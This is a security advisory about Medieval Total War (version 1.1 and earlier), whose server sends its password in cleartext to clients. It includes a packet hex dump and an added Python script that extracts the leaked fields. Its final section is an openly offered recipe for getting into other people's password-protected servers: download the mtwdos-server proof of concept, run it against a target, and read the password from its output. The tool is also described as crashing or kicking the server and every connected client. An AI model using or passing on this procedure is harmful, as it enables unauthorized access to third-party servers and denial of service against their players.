######################################################################

Does the password protection in Medieval Total War really exist?

by Luigi Auriemma
e-mail: aluigi@autistici.org
web:    aluigi.org

######################################################################


The password protection in Medieval Total War (version <= 1.1) is
incredibly stupid. In practice the password is NOT checked by the
server, as ALL the normal programs in the world do, but IS checked by
the client itself!

Q: But how does the client know if the password is right???

A: Look at the following dump of an MTW packet sent by the server:

  49 00 00 00 0e cc e3 00 01 88 81 01 00 00 50 80   I....¦Ò..êü...P
  00 00 00 00 00 00 00 00 05 01 00 39 ed cc 08 a7   ...........9ݦ.
  08 a7 00 1d 02 79 bb 1b c2 00 68 00 69 00 6c 00   .º...y+.-.h.i.l.
  6c 00 79 00 69 00 6e 00 6c 00 61 00 6e 00 64 00   l.y.i.n.l.a.n.d.
  31 00 33 00 00 00 73 00 65 00 72 00 76 00 65 00   1.3...s.e.r.v.e.
  72 00 6e 00 61 00 6d 00 65 00 00 00 6d 00 79 00   r.n.a.m.e...m.y.
  73 00 65 00 63 00 72 00 65 00 74 00 70 00 61 00   s.e.c.r.e.t.p.a.
  73 00 73 00 77 00 6f 00 72 00 64 00 00 00 63 00   s.s.w.o.r.d...c.
  61 00 6d 00 70 00 6d 00 61 00 70 00 5c 00 73 00   a.m.p.m.a.p.\.s.
  74 00 61 00 72 00 74 00 70 00 6f 00 73 00 5c 00   t.a.r.t.p.o.s.\.
  4c 00 61 00 74 00 65 00 2e 00 74 00 78 00 74 00   L.a.t.e...t.x.t.
  00 00 00 fe 1f 00 00 00 00 00 00 00 00 ff ff ff   ..._.........
  00 73 00 65 00 72 00 76 00 65 00 72 00 6e 00 61   .s.e.r.v.e.r.n.a
  00 6d 00 65 00 00                                 .m.e..

In this dump we can see some strings in plain text (Unicode, UTF-16LE:
each character is followed by a null byte, and each string ends with a
null character, 00 00):

  hillyinland13:              the map to use
  servername:                 the name of the server
  mysecretpassword:           just the server's password 8-)
  campmap\startpos\Late.txt:  type of campaign

So, as you can see, the password is sent in plain text to the client,
which simply asks the user to type the same password and compares the
two. The check is done completely by the client, NOT by the server.
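The following script is added here as an example; it is not part of the original advisory nor of the mtwdos-server tool. It rebuilds the dumped packet byte for byte, extracts every cleartext UTF-16LE field, and lets a server administrator confirm from a capture of the lobby handshake that a configured password leaves the server in the clear; server_side_check shows where the comparison should have lived (on the server, against what the client submits). The regular expression, the function names and the 214-byte reconstruction are assumptions of this example.

```python
import hmac
import re

# Server-to-client handshake reproduced byte for byte from the hex dump above.
MTW_HANDSHAKE = bytes.fromhex(
    "49 00 00 00 0e cc e3 00 01 88 81 01 00 00 50 80 "
    "00 00 00 00 00 00 00 00 05 01 00 39 ed cc 08 a7 "
    "08 a7 00 1d 02 79 bb 1b c2 00 68 00 69 00 6c 00 "
    "6c 00 79 00 69 00 6e 00 6c 00 61 00 6e 00 64 00 "
    "31 00 33 00 00 00 73 00 65 00 72 00 76 00 65 00 "
    "72 00 6e 00 61 00 6d 00 65 00 00 00 6d 00 79 00 "
    "73 00 65 00 63 00 72 00 65 00 74 00 70 00 61 00 "
    "73 00 73 00 77 00 6f 00 72 00 64 00 00 00 63 00 "
    "61 00 6d 00 70 00 6d 00 61 00 70 00 5c 00 73 00 "
    "74 00 61 00 72 00 74 00 70 00 6f 00 73 00 5c 00 "
    "4c 00 61 00 74 00 65 00 2e 00 74 00 78 00 74 00 "
    "00 00 00 fe 1f 00 00 00 00 00 00 00 00 ff ff ff "
    "00 73 00 65 00 72 00 76 00 65 00 72 00 6e 00 61 "
    "00 6d 00 65 00 00"
)

# A run of two or more printable ASCII characters encoded as UTF-16LE (char, 0x00).
# The scan is byte-aligned on purpose: the second "servername" sits at an odd offset.
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){2,}")


def utf16_strings(packet: bytes):
    """Return every cleartext UTF-16LE string field found in the packet, in order."""
    return [m.group().decode("utf-16-le") for m in UTF16_RUN.finditer(packet)]


def leaked_secrets(packet: bytes, secrets):
    """Which of the server's configured secrets travel in the clear in this packet?
    An admin can run this over a captured lobby handshake (assumed capture format: raw payload)."""
    fields = utf16_strings(packet)
    return [s for s in secrets if s in fields]


def server_side_check(configured: str, submitted: str) -> bool:
    """Where the comparison belongs: the server keeps the password and compares what
    the client submits, so the secret never has to be sent to the client at all."""
    return hmac.compare_digest(configured.encode("utf-8"), submitted.encode("utf-8"))


if __name__ == "__main__":
    print(utf16_strings(MTW_HANDSHAKE))
    print("leaked:", leaked_secrets(MTW_HANDSHAKE, ["mysecretpassword"]))
```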
If you want to join an MTW server protected by password, follow these
instructions:

1) Get my mtwdos-server proof-of-concept from:

     http://aluigi.org/poc/mtwdos-server.zip

2) Now from your console write the following command:

     mtwdos-server 1 SERVER

   where 1 is the number of chars of your nickname (DON'T use 0 or a
   number greater than 75 or the server will crash!) and SERVER is the
   IP or the name of the server protected by password.

3) You will receive an output like the following:

     C:\>mtwdos-server 1 p400

     Medieval Total War <= 1.1 broadcast kick and crash 0.1
     by Luigi Auriemma
     e-mail: aluigi@autistici.org
     web:    aluigi.org

     All the clients connected to the server and the same server in the
     Lobby screen will be kicked or crashed immediately

     Getting the challenge key of the remote server...

       Admin name:    nomedistocazzo
       Map name:      hillyinland13
       Server name:   servername
       Password:      mysecretpassword
       Campaign:      campmap\startpos\Late.txt
       Challenge key: 16835532

     Malicious login informations successfully sent

4) The fourth line of that information block is just the server's
   password:

     Password: mysecretpassword

5) Now that you have the password, join the match and happy gaming 8-)